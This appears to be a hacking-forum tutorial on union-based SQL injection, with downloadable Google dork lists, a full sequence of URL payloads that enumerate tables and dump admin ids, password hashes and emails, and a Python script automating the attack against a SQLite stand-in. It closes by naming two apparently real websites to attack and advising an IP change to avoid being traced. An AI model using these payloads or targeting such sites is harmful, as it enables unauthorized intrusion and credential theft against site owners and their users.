
First of all, how do you find SQL-injectable sites to attack?

First download this file:

http://rapidshare.com/files/317187675/dork.txt

Open the text file and you will see plenty of search strings (Google dorks).

Now open Google and copy-paste any one line from the file.

The results Google returns are sites whose URLs match that dork. That only means they take a parameter the way injectable pages often do; each one still has to be tested as shown below.

So now we will take an example website that we assume is vulnerable:

http://www.example.pl/news.php?id=17'

Add a ' to the end of the URL to check whether it is vulnerable. If the page throws a database error, the quote broke the query, which means the parameter is being pasted straight into SQL. So I remove the ' and do:

http://www.example.pl/news.php?id=17 order by 1--
http://www.example.pl/news.php?id=17 order by 2--
http://www.example.pl/news.php?id=17 order by 3--

If there is no error we continue, raising the number by one each time, until we finally get an error, for example at:

http://www.example.pl/news.php?id=17 order by 13--

That tells us column 13 does not exist, so the query behind the page selects 12 columns. (This is the column count of that one SELECT, not of the whole database.)

Note: the count differs for every site. It could be more than 100 or less than 10, so keep raising the number until you find the last one. A caveat for MySQL: the -- comment only works with a space after it, so if even "order by 1--" errors, send --+ or --%20 (or #) instead.
So now we use UNION SELECT with the same number of columns, as shown below:

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--

(Note: make sure to add a - after the = so the id is -17. No article has a negative id, so the original query returns no row and the page renders the row our UNION SELECT supplies.)

Hit enter.

Let's assume the numbers 4 and 5 appear somewhere in the page. That means columns 4 and 5 are displayed, so data can be extracted through them. (You will see different numbers on different sites.)


Replace the 4 in the URL with @@version so it now looks like:

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12--

Hit enter, and let's assume the page now shows:

5.0.32-Debian_7etch8-log

That is the MySQL version running. Version 5 helps a lot: from 5.0 on, MySQL has the information_schema database, which lists every table and column, so we can read the names instead of guessing them (on versions 4 and below we have to guess the table names). Remember the version will differ from site to site.


Where we put @@version (the 4th spot), replace it with

group_concat(table_name)

which joins all the table names into one string, like:

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12--

Then at the end of the UNION SELECT string, remove the -- after the 12 and add

+from+information_schema.tables+where+table_schema=database()--

(the + signs are just URL-encoded spaces, and database() is the schema the site itself is using). So it now looks like:

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--

You will see something like this:

x_admins,x_articles,x_ban,x_banners,x_banners_info,x_comments,x_file_categories,x_file_data,x_forum_a,x_forum_b,x_forum_c,x_gbook,x_infopages,x_links_categories,x_links_data,x_mails,x_menu,x_news,x_poll_data,x_poll_desc,x_pw,x_topic,x_users



Now replace group_concat(table_name) with group_concat(column_name), and everything after 5,6,7,8,9,10,11,12 with

+from+information_schema.columns+where+table_name='x_admins'--

so it goes from

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12 +from+information_schema.tables+where+table_schema=database()--

to

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 +from+information_schema.columns+where+table_name='x_admins'--

and we see: id,nick,pass,name,added,access,mail,stat

(If the site strips or escapes quotes, write the table name as a hex literal instead: table_name=0x785f61646d696e73 is 'x_admins'.)

Now that we know the column names, we pull the rows themselves. Put

group_concat(id,0x3a,pass,0x3a,mail)

where group_concat(column_name) was (0x3a is a colon, used as a separator so the fields stay readable), and add +from+x_admins-- after 10,11,12.

So the string becomes:

http://www.example.pl/news.php?id=-17 UNION SELECT 1,2,3,group_concat(id,0x3a,pass,0x3a,mail),5,6,7,8,9,10,11,12 +from+x_admins--

At this point we obtain the admin's id, password (often stored as a hash rather than plaintext) and mail.

And it's done.

You will not be able to do the steps successfully every time, because the site's script and SQL differ from site to site, but the basics remain as posted.

Note: if the version is lower than 5 there is no information_schema, so you need to guess the table name. Here is a table name list for you:

http://rapidshare.com/files/317214866/table.txt

So I will pick one as an example: tblclients. Add it at the end, before the --, like this:

article_viewer.php?id=-5%20UNION%20SELECT%201,2,@@VERSION,4,5,6,7,8,9,10,11,12+from+tblclients--

If the table does not exist the query errors; if the page renders with the version in column 3, the guess was right, and column names are guessed the same way.
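Here is the whole procedure, from the ORDER BY count through the x_admins dump, plus the table-name guessing fallback above, as an added runnable example written for this page (it is not the original author's code). It runs against a constructed in-memory SQLite stand-in for news.php, so SQLite expressions replace the MySQL ones: sqlite_version() for @@version, sqlite_master for information_schema.tables, pragma_table_info() for information_schema.columns, and || ':' || for group_concat(a,0x3a,b). The table and column names, the sample admin row and the rendered-column layout (columns 4 and 5) are assumptions chosen to match the walkthrough. The fixed news_page_safe shows why the same payloads get nowhere against a parameterized query.

```python
import re
import sqlite3


def build_db():
    """Constructed stand-in for the target: an in-memory SQLite database with a
    12-column x_news table (as in the post's walkthrough) and one sample admin."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE x_news (id INTEGER, title TEXT, body TEXT, author TEXT, "
        "c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT, c9 TEXT, c10 TEXT, c11 TEXT, c12 TEXT)"
    )
    db.execute("INSERT INTO x_news VALUES (17, 'Hello', 'world', 'editor', "
               "'', '', '', '', '', '', '', '')")
    db.execute("CREATE TABLE x_admins (id INTEGER, nick TEXT, pass TEXT, mail TEXT)")
    db.execute("INSERT INTO x_admins VALUES (1, 'admin', "
               "'5f4dcc3b5aa765d61d8327deb882cf99', 'admin@example.pl')")
    return db


def news_page_vulnerable(db, id_param):
    """news.php as the post assumes it is written: the id parameter is glued
    into the SQL string. The template renders columns 4 and 5 of the row."""
    sql = "SELECT * FROM x_news WHERE id=" + id_param  # the injection point
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as e:
        return "ERROR: " + str(e)  # the database error the post watches for
    if row is None:
        return "no such article"
    return f"{row[3]} / {row[4]}"


def news_page_safe(db, id_param):
    """The fix: check the type, then bind the value instead of concatenating."""
    try:
        article_id = int(id_param)
    except ValueError:
        return "bad id"
    row = db.execute("SELECT * FROM x_news WHERE id=?", (article_id,)).fetchone()
    if row is None:
        return "no such article"
    return f"{row[3]} / {row[4]}"


def count_columns(page, max_cols=200):
    """ORDER BY step: raise n until the page errors; n-1 is the column count."""
    for n in range(1, max_cols + 1):
        if page(f"17 ORDER BY {n}--").startswith("ERROR"):
            return n - 1
    return None  # never errored: not injectable this way


def find_reflected(page, ncols):
    """UNION SELECT 1,2,...,n step. The negative id makes the original query
    return nothing, so the UNION row is what gets rendered; the numbers that
    show up mark the displayed columns."""
    out = page("-17 UNION SELECT " + ",".join(str(i) for i in range(1, ncols + 1)) + "--")
    return [i for i in range(1, ncols + 1) if re.search(rf"\b{i}\b", out)]


def extract(page, ncols, slot, expr, from_clause=""):
    """Put an expression into a displayed slot, keep the other slots numeric."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[slot - 1] = expr
    return page(f"-17 UNION SELECT {','.join(cols)}{from_clause}--")


def table_exists(page, ncols, name):
    """Fallback for servers without information_schema: UNION SELECT ...
    FROM <guess> renders normally only when the guessed table exists."""
    return not extract(page, ncols, 4, "'probe'", f" FROM {name}").startswith("ERROR")


def run_attack(page):
    """Walk the post's steps against a page function and collect the findings
    (SQLite expressions stand in for the MySQL ones, see the comments)."""
    ncols = count_columns(page)
    if ncols is None:
        return {"columns": None}
    shown = find_reflected(page, ncols)
    slot = shown[0]
    return {
        "columns": ncols,
        "reflected": shown,
        "version": extract(page, ncols, slot, "sqlite_version()"),  # @@version
        "tables": extract(page, ncols, slot, "group_concat(name)",   # information_schema.tables
                          " FROM sqlite_master WHERE type='table'"),
        "admin_columns": extract(page, ncols, slot, "group_concat(name)",  # information_schema.columns
                                 " FROM pragma_table_info('x_admins')"),
        "admins": extract(page, ncols, slot,                          # group_concat(id,0x3a,pass,0x3a,mail)
                          "group_concat(id||':'||pass||':'||mail)", " FROM x_admins"),
        "tblclients_exists": table_exists(page, ncols, "tblclients"),
        "x_admins_exists": table_exists(page, ncols, "x_admins"),
    }


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", run_attack(lambda p: news_page_vulnerable(db, p)))
    print("fixed:", run_attack(lambda p: news_page_safe(db, p)))
```

Against the vulnerable page this finds 12 columns, displayed slots 4 and 5, the table list, the x_admins columns and the admin row; against the fixed page no payload ever produces a database error, so the ORDER BY probe finds nothing. One caveat that carries over to MySQL: the probe treats any error as the signal, so on a site that hides errors (blank page instead of a message) you have to compare page content instead.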


You can try it on sites like:
http://www.yaseenintloep.com.pk/formal.php?pageid=8
http://www.shaadiwaadi.com/index.php?id=26

Note: as I always say, it is a risky game. If you are doing it, change your IP and port. I am not responsible for this; we are posting it for educational purposes only.
